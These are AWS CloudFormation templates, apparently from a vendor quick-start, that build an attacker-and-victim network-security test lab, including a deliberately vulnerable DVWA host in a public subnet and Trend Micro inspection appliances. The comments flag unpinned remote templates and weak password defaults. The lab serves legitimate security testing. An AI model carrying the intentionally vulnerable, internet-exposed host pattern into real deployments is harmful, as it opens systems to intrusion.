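      Parameters:
        DVWAInstanceType: !Ref DVWAInstanceType
        KeyPairName: !Ref sshKeyPairName
        PublicSubnet1ID: !GetAtt VictimVpc.Outputs.PublicSubnet1ID
        QSS3BucketName: !Ref BucketName
        QSS3KeyPrefix: !Ref BucketPrefix
        DVWARemoteAccessCIDR: !Ref AllowIP
        QSS3BucketRegion: !Ref BucketRegion
        VPCID: !GetAtt VictimVpc.Outputs.VPCID
  # ------------------------------------------------------------#
  # Create Attacker VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW)
  # ------------------------------------------------------------#
  AttackerVpc:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml
      Parameters:
        VPCCIDR: 172.16.0.0/16
        PrivateSubnet1ACIDR: 172.16.1.0/24
        PrivateSubnet2ACIDR: 172.16.2.0/24
        PublicSubnet1CIDR: 172.16.11.0/24
        PublicSubnet2CIDR: 172.16.12.0/24
        NumberOfAZs: 2
        AvailabilityZones: !Join
          - ","
          - - !Select
              - 0
              - Fn::GetAZs: !Ref AWS::Region
            - !Select
              - 1
              - Fn::GetAZs: !Ref AWS::Region

  # ------------------------------------------------------------#
  # Create Attacker Site (EC2, SecurityGroup)
  # ------------------------------------------------------------#
  # Mirror of the victim site: its web server accepts traffic from the victim VPC CIDR.
  Attacker:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml
      Parameters:
        ImageId: !FindInMap [RegionMap, !Ref 'AWS::Region', ImageId]
        AllowIP: !Ref AllowIP
        NeedSSMAccess: !Ref SSMAccess
        VPCId: !GetAtt AttackerVpc.Outputs.VPCID
        PrivateSubnet1ID: !GetAtt AttackerVpc.Outputs.PrivateSubnet1AID
        WebServerIngressAllowCIDR: 192.168.0.0/16

  # ------------------------------------------------------------#
  # Create c1ns macro template
  # ------------------------------------------------------------#
  # Supply-chain note: this and the security VPC template below are fetched
  # from a vendor-owned bucket at deploy time, with no version pin or checksum.
  # Whatever is at the URL when the stack runs is executed with the deploying
  # principal's permissions (a macro stack typically registers a Lambda-backed
  # CloudFormation transform). Mirror a reviewed copy into your own bucket if
  # you need change control over it.
  c1nsMacroTemplate:
    Condition: DeployC1NS
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/macro.yml

  # ------------------------------------------------------------#
  # Create c1ns security vpc template
  # ------------------------------------------------------------#
  c1nsSecurityVPCTemplate:
    Condition: DeployC1NS
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/security_vpc_legacy.yaml
      Parameters:
        sshKeyPairName: !Ref sshKeyPairName
        CloudOneAPIKEY: !Ref CloudOneAPIKEY
        NSVAAMI: !FindInMap [NSVAAMIRegionMap, !Ref 'AWS::Region', ImageId]
        InstanceType: !Ref InstanceType
        AvailabilityZones: !Join
          - ","
          - - !Select
              - 0
              - Fn::GetAZs: !Ref AWS::Region
            - !Select
              - 1
              - Fn::GetAZs: !Ref AWS::Region
        SecurityVPCCIDR: !Ref SecurityVPCCIDR
        NsvaCountPerAz: !Ref NsvaCountPerAz
        EnableInspectionLogs: !Ref EnableInspectionLogs
    DependsOn: c1nsMacroTemplate

  # ------------------------------------------------------------#
  # Create Last modify setting template (modify route table)
  # ------------------------------------------------------------#
  # Re-points the private route tables of both VPCs through the security VPC.
  ModifyRTTemplate:
    Condition: DeployC1NS
    DependsOn: c1nsSecurityVPCTemplate
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/last.yaml
      Parameters:
        AttackerVpcId: !GetAtt AttackerVpc.Outputs.VPCID
        VictimVpcId: !GetAtt VictimVpc.Outputs.VPCID
        AttackerPrivateSubnet1Id: !GetAtt AttackerVpc.Outputs.PrivateSubnet1AID
        AttackerPrivateSubnet2Id: !GetAtt AttackerVpc.Outputs.PrivateSubnet2AID
        VictimPrivateSubnet1Id: !GetAtt VictimVpc.Outputs.PrivateSubnet1AID
        VictimPrivateSubnet2Id: !GetAtt VictimVpc.Outputs.PrivateSubnet2AID
        AttackerPrivateSubnet1RouteTableId: !GetAtt AttackerVpc.Outputs.PrivateSubnet1ARouteTable
        AttackerPrivateSubnet2RouteTableId: !GetAtt AttackerVpc.Outputs.PrivateSubnet2ARouteTable
        VictimPrivateSubnet1RouteTableId: !GetAtt VictimVpc.Outputs.PrivateSubnet1ARouteTable
        VictimPrivateSubnet2RouteTableId: !GetAtt VictimVpc.Outputs.PrivateSubnet2ARouteTable
        VictimVpcCIDR: 192.168.0.0/16
        AttackerVpcCIDR: 172.16.0.0/16
        # A nested stack's Ref is its ARN (arn:...:stack/NAME/ID); piece 1 of
        # the '/' split is the stack name.
        SecurityVpcStackName: !Select [1, !Split ['/', !Ref c1nsSecurityVPCTemplate]]
        SecurityVpcId: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCID
        VPCEndpointServiceName: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCEndpointServiceName
        AvailabilityZones: !Join
          - ","
          - - !Select
              - 0
              - Fn::GetAZs: !Ref AWS::Region
            - !Select
              - 1
              - Fn::GetAZs: !Ref AWS::Region

# ------------------------------------------------------------#
# Output Site URLs
# ------------------------------------------------------------#
Outputs:
  AttackerWebServerIP:
    Value: !GetAtt Attacker.Outputs.WebServerIP
    Description: Attacker Webserver IP
  VictimWebServerIP:
    Value: !GetAtt Victim.Outputs.WebServerIP
    Description: Victim Webserver IP
  DVWAIP:
    Value: !GetAtt DVWA.Outputs.DVWAPublicIP
    Description: DVWA instance Public IP
  DVWADeployment:
    Value: !GetAtt DVWA.Outputs.Postdeployment
    Description: See the deployment guide for post-deployment steps
--------------------------------------------------------------------------------
/centralized-with-gwlb/templates/Master.yaml:
--------------------------------------------------------------------------------
AWSTemplateFormatVersion: 2010-09-09

Mappings:
  # Base-site (web server) AMI per region. AMI IDs are pinned by hand; a region
  # missing from the map fails at FindInMap time.
  RegionMap:
    ap-northeast-1:
      ImageId: "ami-05f01a6a414be9808"
      HostedId: "Z1YSHQZHG15GKL"
    ap-northeast-2:
      ImageId: "ami-06835923fab139b98"
      HostedId: "Z20JF4UZKIW1U8"
    ap-northeast-3:
      ImageId: "ami-081eaee471c0e1518"
      HostedId: "Z5LXEXXYW11ES"
    us-east-2:
      ImageId: "ami-0233c2d874b811deb"
      HostedId: "ZOJJZC49E0EPZ"
    us-east-1:
      ImageId: "ami-0dc2d3e4c0f9ebd18"
      HostedId: "Z1UJRXOUMOOFQ8"
    us-west-1:
      ImageId: "ami-0ed05376b59b90e46"
      HostedId: "Z2MUQ32089INYE"
    us-west-2:
      ImageId: "ami-0dc8f589abe99f538"
      HostedId: "Z2OJLYMUO9EFXC"
    ap-south-1:
      ImageId: "ami-00bf4ae5a7909786c"
      HostedId: "Z3VO1THU9YC4UR"
    ap-southeast-1:
      ImageId: "ami-0e5182fad1edfaa68"
      HostedId: "ZL327KTPIQFUL"
    ap-southeast-2:
      ImageId: "ami-0c9fe0dec6325a30c"
      HostedId: "Z2RPCDW04V8134"
    ca-central-1:
      ImageId: "ami-0db72f413fc1ddb2a"
      HostedId: "Z19DQILCV0OWEC"
    eu-central-1:
      ImageId: "ami-00f22f6155d6d92c5"
      HostedId: "Z1U9ULNL0V5AJ3"
    eu-west-1:
      ImageId: "ami-058b1b7fe545997ae"
      HostedId: "ZLY8HYME6SFDD"
    eu-west-2:
      ImageId: "ami-03ac5a9b225e99b02"
      HostedId: "ZJ5UAJN8Y3Z2Q"
    eu-west-3:
      ImageId: "ami-062fdd189639d3e93"
      HostedId: "Z3KY65QIEKYHQQ"
    eu-north-1:
      ImageId: "ami-00517306b63c4628c"
      HostedId: "Z3UWIKFBOOGXPP"
    sa-east-1:
      ImageId: "ami-0f8243a5175208e08"
      HostedId: "ZCMLWB8V5SYIT"
    # ap-east-1:
    #   HostedId: "Z3FD1VL90ND7K5"
    # me-south-1:
    #   HostedId: "Z20ZBPC0SS8806"
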
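# (continuation of Mappings from the previous line)
  # Cloud One Network Security virtual appliance (NSVA) AMI per region.
  NSVAAMIRegionMap:
    # IPS_AMI--2021.7.0.11129
    us-east-1:
      ImageId: ami-0c55b11b8c1850074
    us-east-2:
      ImageId: ami-049ac6c43ccc0eb59
    us-west-1:
      ImageId: ami-0c61fb7ad31615bc9
    us-west-2:
      ImageId: ami-0abee844f98a90719
    # Fixed: the region code is "af-south-1"; the former "af-south1" key could
    # never match AWS::Region, so FindInMap failed for every Cape Town deployment.
    af-south-1:
      ImageId: ami-07beb2f931b25bac4
    ap-east-1:
      ImageId: ami-0eef4c54b43719b15
    ap-south-1:
      ImageId: ami-0bb4faee68f7cbd25
    # NOTE(review): these two entries are identical to the base-site AMIs in
    # RegionMap above (ami-06835923fab139b98 / ami-05f01a6a414be9808); confirm
    # they really are the NSVA images for ap-northeast-1/2.
    ap-northeast-2:
      ImageId: ami-06835923fab139b98
    ap-northeast-1:
      ImageId: ami-05f01a6a414be9808
    ap-southeast-1:
      ImageId: ami-08c9d7bc95ea77e79
    ap-southeast-2:
      ImageId: ami-095df8b8ec0e0aac5
    ca-central-1:
      ImageId: ami-0c1c1a2c0b54eea1e
    eu-north-1:
      ImageId: ami-0c3ba132507949f56
    eu-west-3:
      ImageId: ami-02c47030c3e886b4f
    eu-west-2:
      ImageId: ami-062e147780edfffc4
    eu-west-1:
      ImageId: ami-0c0a077459b3222d9
    eu-central-1:
      ImageId: ami-039d4a40e711415db
    eu-south-1:
      ImageId: ami-001fe5ed24c292c15
    me-south-1:
      ImageId: ami-036c40a2988da6da7
    sa-east-1:
      ImageId: ami-0edc19454ec876784

Metadata:
  AWS::CloudFormation::Interface:
    ParameterGroups:
      - Label:
          default: Required parameters
        Parameters:
          - AllowIP
          - BucketName
          - BucketPrefix
          - BucketRegion
          - DVWAInstanceType
          - sshKeyPairName
          - SSMAccess
          - DeployHTTPS
          - DeployC1NS
          - DeployC1NSHA
          - DeploySplunk
      - Label:
          default: If you set the DeployHTTPS parameter to true, the following parameters are required
        Parameters:
          - DomainName
          - SubDomain
          - HostZoneID
      - Label:
          default: If you set the DeployC1NS parameter to true, the following parameters are required
        Parameters:
          - CloudOneAPIKEY
          - InstanceType
          - SecurityVPCCIDR
          - NsvaCountPerAz
          - EnableInspectionLogs
      - Label:
          default: If you set the DeploySplunk parameter to true, the following parameters are required
        Parameters:
          - SyslogPort
          - SplunkPassword
          - SplunkVersion

Parameters:
  # ------------------------------------------------------------#
  # Required parameters
  # ------------------------------------------------------------#
  # Source CIDR that the nested stacks allow in to the demo hosts (passed as
  # AllowIP / DVWARemoteAccessCIDR). Keep it as narrow as possible: the DVWA
  # host is intentionally vulnerable and sits in a public subnet.
  AllowIP:
    Description: Enter the global IP of the terminal to be tested
    Type: String
    # Octets limited to 0-255 and the prefix to 0-32. The previous
    # \d{1,3}/\d{1,2} pattern accepted values such as 999.1.1.1/99 that can
    # only fail later, when a nested stack tries to use them.
    AllowedPattern: "^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])/(3[0-2]|[12]?[0-9])$"
    ConstraintDescription: "Must be a valid IPv4 CIDR of the form x.x.x.x/0-32"
    # Loopback by default, i.e. nobody is allowed in until the operator sets it.
    Default: '127.0.0.1/32'
  # Location of the nested templates. Anyone who can write to this bucket
  # controls what the nested stacks deploy.
  BucketName:
    Description: Name of the bucket where the template is placed
    Type: String
    Default: 'quickstart-network-security'
  BucketPrefix:
    Description: Bucket prefix
    Type: String
    Default: 'centralized-with-gwlb/'
  BucketRegion:
    Description: Bucket region
    Type: String
    Default: 'us-west-1'
  DVWAInstanceType:
    AllowedValues:
      - t2.nano
      - t2.micro
      - t2.small
      - t2.medium
      - t2.large
      - t3.micro
      - t3.small
      - t3.medium
      - t3.large
      - t3.xlarge
      - t3.2xlarge
      - m3.large
      - m3.xlarge
      - m3.2xlarge
      - m4.large
      - m4.xlarge
      - m4.2xlarge
      - m4.4xlarge
    Default: t3.micro
    Description: "Amazon EC2 instance type for the DVWA instances. Damn Vulnerable Web
      Application (DVWA) hosts are machines placed in the public subnet which are PHP/MySQL Web App and are vulnerable.
      This allows security professionals to test Network Security in a legal
      environment. For more information visit: https://dvwa.co.uk/"
    Type: String
  sshKeyPairName:
    Description: SSH Key of the EC2 you are using
    Type: AWS::EC2::KeyPair::KeyName
    ConstraintDescription: Must be the name of an existing EC2 KeyPair
  SSMAccess:
    Description: If enabled, SSM access to the instance will be available.
    Type: String
    AllowedValues: [true, false]
    Default: true
  DeployHTTPS:
    Description: If enabled, The HTTPS site will be deployed.
    Type: String
    AllowedValues: [true, false]
    Default: false
  DeployC1NS:
    Description: If enabled, C1NS with be deployed in centralized Security VPC
    Type: String
    AllowedValues: [true, false]
    Default: true
  # The two flags below are only honoured when DeployC1NS is also true (see the
  # DeployC1NSHA / DeploySplunk conditions).
  DeployC1NSHA:
    Description: "[Required: 'DeployC1NS' must be set to true] If enabled, C1NS HA deployed."
    Type: String
    AllowedValues: [true, false]
    Default: false
  DeploySplunk:
    Description: "[Required: 'DeployC1NS' must be set to true] If enabled, Splunk Server will be deployed."
    Type: String
    AllowedValues: [true, false]
    Default: false
  # ------------------------------------------------------------#
  # If you set the DeployHTTPS parameter to true, the following parameters are required
  # ------------------------------------------------------------#
  DomainName:
    Description: Domain name to be used for the website.
    Type: String
    Default: ''
  SubDomain:
    Description: Subdomain to be used for the ALB.
    Type: String
    Default: ''
  HostZoneID:
    Description: ID of the HostZone where the domain you want to use is registered.
    Type: String
    Default: ''
  # ------------------------------------------------------------#
  # If you set the DeployC1NS parameter to true, the following parameters are required
  # ------------------------------------------------------------#
  # NoEcho hides the value in this stack's parameter list; the nested
  # security-VPC template it is forwarded to must declare NoEcho as well, or the
  # key is visible in the nested stack's parameters.
  CloudOneAPIKEY:
    Description: Trend Micro Cloud One API key you want to use.
    Type: String
    NoEcho: true
  InstanceType:
    Description: Instance type of NSVA
    Type: String
    AllowedValues:
      - c5.9xlarge
      - c5.4xlarge
      - c5.2xlarge
      - c5n.9xlarge
      - c5n.4xlarge
      - c5n.2xlarge
    Default: c5n.2xlarge
  SecurityVPCCIDR:
    Description: CIDR of the VPC where you want to deploy the NSVA.
    Type: String
    AllowedPattern: "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/(1[6-9]|2[0-6]))$"
    ConstraintDescription: "CIDR block parameter must be in the form x.x.x.x/16-26"
    # NOTE(review): 10.10.10.0/16 has host bits set (the /16 network is
    # 10.10.0.0/16). EC2 normally rejects non-canonical VPC CIDRs -- confirm
    # against security_vpc_legacy.yaml or change the default to 10.10.0.0/16.
    Default: "10.10.10.0/16"
  NsvaCountPerAz:
    Description: Number of NSVA instances to be deployed in the AZ.
    Type: Number
    AllowedValues:
      - 1
      - 2
      - 3
      - 4
    Default: 1
  EnableInspectionLogs:
    Description: If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs".
    Type: String
    AllowedValues: [ true, false ]
    Default: false
  # ------------------------------------------------------------#
  # If you set the DeploySplunk parameter to true, the following parameters are required
  # ------------------------------------------------------------#
  SyslogPort:
    Description: Port number used by Splunk Server
    Type: String
    # Digits only: the value is handed to the Splunk nested stack as a port,
    # which previously accepted any string.
    AllowedPattern: "^[0-9]{1,5}$"
    ConstraintDescription: "Must be a numeric port"
    Default: '5140'
  SplunkPassword:
    Description: Password used by Splunk Server
    Type: String
    NoEcho: true
    # NOTE(review): the empty default lets the parameter be omitted when
    # DeploySplunk=false, but it also lets a Splunk deployment go out with an
    # empty password; have the splunk nested stack enforce a MinLength.
    Default: ''
  SplunkVersion:
    Description: Splunk Version
    Type: String
    Default: '8.2'

# ------------------------------------------------------------#
# Conditions
# ------------------------------------------------------------#
Conditions:
  DeployHTTPS: !Equals [true, !Ref DeployHTTPS]
  DeployC1NS: !Equals [true, !Ref DeployC1NS]
  DeployC1NSHAmodel: !Equals [true, !Ref DeployC1NSHA]
  # HA and Splunk are only deployed together with C1NS.
  DeployC1NSHA: !And
    - !Condition DeployC1NS
    - !Condition DeployC1NSHAmodel
  DeploySplunksrv: !Equals [true, !Ref DeploySplunk]
  DeploySplunk: !And
    - !Condition DeployC1NS
    - !Condition DeploySplunksrv

Resources:
  # ------------------------------------------------------------#
  # Create Base VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW)
  # ------------------------------------------------------------#
  BaseVPC:
    Type: AWS::CloudFormation::Stack
    Properties:
      TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml
      Parameters:
        NumberOfAZs: 2
        # First two AZs of the deployment region, as "az1,az2".
        AvailabilityZones: !Join
          - ","
          - - !Select
              - 0
              - Fn::GetAZs: !Ref AWS::Region
            - !Select
              - 1
              - Fn::GetAZs: !Ref AWS::Region

  # ------------------------------------------------------------#
  # Create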
DVWA (DVWA Instance) 334 | # ------------------------------------------------------------# 335 | DVWA: 336 | Type: AWS::CloudFormation::Stack 337 | Properties: 338 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/dvwa.yaml 339 | Parameters: 340 | DVWAInstanceType: !Ref DVWAInstanceType 341 | KeyPairName: !Ref sshKeyPairName 342 | PublicSubnet1ID: !GetAtt BaseVPC.Outputs.PublicSubnet1ID 343 | QSS3BucketName: !Ref BucketName 344 | QSS3KeyPrefix: !Ref BucketPrefix 345 | DVWARemoteAccessCIDR: !Ref AllowIP 346 | QSS3BucketRegion: !Ref BucketRegion 347 | VPCID: !GetAtt BaseVPC.Outputs.VPCID 348 | 349 | # ------------------------------------------------------------# 350 | # Create Base Site (EC2, SecurityGroup) 351 | # ------------------------------------------------------------# 352 | BaseSite: 353 | Type: AWS::CloudFormation::Stack 354 | Properties: 355 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml 356 | Parameters: 357 | ImageId: !FindInMap 358 | - RegionMap 359 | - !Ref 'AWS::Region' 360 | - ImageId 361 | AllowIP: !Ref AllowIP 362 | NeedSSMAccess: !Ref SSMAccess 363 | VPCId: !GetAtt BaseVPC.Outputs.VPCID 364 | PrivateSubnet1ID: !GetAtt BaseVPC.Outputs.PrivateSubnet1AID 365 | PublicSubnet1ID: !GetAtt BaseVPC.Outputs.PublicSubnet1ID 366 | PublicSubnet2ID: !GetAtt BaseVPC.Outputs.PublicSubnet2ID 367 | 368 | # ------------------------------------------------------------# 369 | # Create LoadBalancer and https site (ALB, TargetGroup, Listener, ACM) 370 | # ------------------------------------------------------------# 371 | AddALB: 372 | Condition: DeployHTTPS 373 | Type: AWS::CloudFormation::Stack 374 | Properties: 375 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/AddALB.yaml 376 | Parameters: 377 | DomainName: !Ref DomainName 378 | SubDomain: !Ref SubDomain 379 | HostZoneID: !Ref HostZoneID 380 | 
TargetGroupID: !GetAtt BaseSite.Outputs.TargetGroupID 381 | ALBID: !GetAtt BaseSite.Outputs.ALBID 382 | HostedZoneId: !GetAtt BaseSite.Outputs.HostedZoneId 383 | DNSName: !GetAtt BaseSite.Outputs.HTTPWebSiteURL 384 | 385 | # ------------------------------------------------------------# 386 | # Create RemoveRecord Function 387 | # ------------------------------------------------------------# 388 | RemoveRecord: 389 | Condition: DeployHTTPS 390 | Type: AWS::CloudFormation::Stack 391 | Properties: 392 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/RemoveRecord.yaml 393 | Parameters: 394 | HostZoneID: !Ref HostZoneID 395 | 396 | # ------------------------------------------------------------# 397 | # Create c1ns macro template 398 | # ------------------------------------------------------------# 399 | c1nsMacroTemplate: 400 | Condition: DeployC1NS 401 | Type: AWS::CloudFormation::Stack 402 | Properties: 403 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/macro.yml 404 | 405 | # ------------------------------------------------------------# 406 | # Create c1ns security vpc template 407 | # ------------------------------------------------------------# 408 | c1nsSecurityVPCTemplate: 409 | Condition: DeployC1NS 410 | Type: AWS::CloudFormation::Stack 411 | Properties: 412 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/security_vpc_legacy.yaml 413 | Parameters: 414 | sshKeyPairName: !Ref sshKeyPairName 415 | CloudOneAPIKEY: !Ref CloudOneAPIKEY 416 | NSVAAMI: !FindInMap 417 | - NSVAAMIRegionMap 418 | - !Ref 'AWS::Region' 419 | - ImageId 420 | InstanceType: !Ref InstanceType 421 | AvailabilityZones: 422 | Fn::Join: 423 | - "," 424 | - - Fn::Select: 425 | - 0 426 | - Fn::GetAZs: !Ref AWS::Region 427 | - Fn::Select: 428 | - 1 429 | - Fn::GetAZs: !Ref AWS::Region 430 | SecurityVPCCIDR: !Ref SecurityVPCCIDR 431 | NsvaCountPerAz: !Ref NsvaCountPerAz 
432 | EnableInspectionLogs: !Ref EnableInspectionLogs 433 | DependsOn: c1nsMacroTemplate 434 | 435 | # ------------------------------------------------------------# 436 | # Create the IAM role stack for cross-account deployments 437 | # ------------------------------------------------------------# 438 | CrossAccountIAMTemplate: 439 | Condition: DeployC1NSHA 440 | Type: AWS::CloudFormation::Stack 441 | Properties: 442 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/ha_lambda_cross_account_iam.yaml 443 | Parameters: 444 | SecurityVpcAccountId: !Ref "AWS::AccountId" 445 | ExternalId: !GetAtt c1nsSecurityVPCTemplate.Outputs.ExternalId 446 | DependsOn: ModifyRTTemplate 447 | 448 | # ------------------------------------------------------------# 449 | # Create HA stack deployments 450 | # ------------------------------------------------------------# 451 | HaLambdaTemplate: 452 | Condition: DeployC1NSHA 453 | Type: AWS::CloudFormation::Stack 454 | Properties: 455 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/ha_resources_vpc_ingress.yaml 456 | Parameters: 457 | securityVpcStackName: 458 | Fn::Select: 459 | - 1 460 | - Fn::Split: 461 | - / 462 | - !Ref c1nsSecurityVPCTemplate 463 | DependsOn: CrossAccountIAMTemplate 464 | 465 | # ------------------------------------------------------------# 466 | # Create Last modify setting template (modify route table) 467 | # ------------------------------------------------------------# 468 | ModifyRTTemplate: 469 | Condition: DeployC1NS 470 | Type: AWS::CloudFormation::Stack 471 | Properties: 472 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/last.yaml 473 | Parameters: 474 | VPC: !GetAtt BaseVPC.Outputs.VPCID 475 | InternetGateway: !GetAtt BaseVPC.Outputs.IGWID 476 | BasePublicSubnet1CIDR: !GetAtt BaseVPC.Outputs.PublicSubnet1CIDR 477 | BasePublicSubnet2CIDR: !GetAtt BaseVPC.Outputs.PublicSubnet2CIDR 
478 | BasePublicSubnet1RouteTable: !GetAtt BaseVPC.Outputs.PublicSubnet1RouteTable 479 | BasePublicSubnet2RouteTable: !GetAtt BaseVPC.Outputs.PublicSubnet2RouteTable 480 | VPCEndpointServiceName: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCEndpointServiceName 481 | AvailabilityZones: 482 | Fn::Join: 483 | - "," 484 | - - Fn::Select: 485 | - 0 486 | - Fn::GetAZs: !Ref AWS::Region 487 | - Fn::Select: 488 | - 1 489 | - Fn::GetAZs: !Ref AWS::Region 490 | 491 | # ------------------------------------------------------------# 492 | # Create Splunk Server 493 | # ------------------------------------------------------------# 494 | SplunkTemplate: 495 | Condition: DeploySplunk 496 | Type: AWS::CloudFormation::Stack 497 | Properties: 498 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/splunk.yaml 499 | Parameters: 500 | VPCID: !GetAtt BaseVPC.Outputs.VPCID 501 | VPCCIDR: !GetAtt BaseVPC.Outputs.VPCCIDR 502 | RTID: !GetAtt ModifyRTTemplate.Outputs.PublicSubnet1Route 503 | AllowIP: !Ref AllowIP 504 | SyslogPort: !Ref SyslogPort 505 | SecurityVPCCIDR: !Ref SecurityVPCCIDR 506 | ImageId: !FindInMap 507 | - RegionMap 508 | - !Ref 'AWS::Region' 509 | - ImageId 510 | PublicSubnet1ID: !GetAtt ModifyRTTemplate.Outputs.PublicSubnet1ID 511 | SplunkPassword: !Ref SplunkPassword 512 | SplunkVersion: !Ref SplunkVersion 513 | c1nsStackName: 514 | Fn::Select: 515 | - 1 516 | - Fn::Split: 517 | - / 518 | - !Ref c1nsSecurityVPCTemplate 519 | InstanceProfile: !GetAtt BaseSite.Outputs.InstanceProfile 520 | NeedSSMAccess: !Ref SSMAccess 521 | 522 | # ------------------------------------------------------------# 523 | # Output Site URLs 524 | # ------------------------------------------------------------# 525 | Outputs: 526 | HTTPWebSiteURL: 527 | Value: !GetAtt BaseSite.Outputs.HTTPWebSiteURL 528 | Description: HTTP site URL 529 | HTTPSWebSiteURL: 530 | Condition: DeployHTTPS 531 | Value: !GetAtt AddALB.Outputs.HTTPSWebSiteURL 532 | Description: 
HTTPS site URL 533 | SplunkURL: 534 | Condition: DeploySplunk 535 | Value: !GetAtt SplunkTemplate.Outputs.SplunkURL 536 | Description: Splunk URL 537 | SplunkInternalIP: 538 | Condition: DeploySplunk 539 | Value: !GetAtt SplunkTemplate.Outputs.SplunkInternalIP 540 | Description: Splunk private IP address 541 | DVWAIP: 542 | Value: !GetAtt DVWA.Outputs.DVWAPublicIP 543 | Description: DVWA instance Public IP 544 | DVWADeployment: 545 | Value: !GetAtt DVWA.Outputs.Postdeployment 546 | Description: See the deployment guide for post-deployment steps --------------------------------------------------------------------------------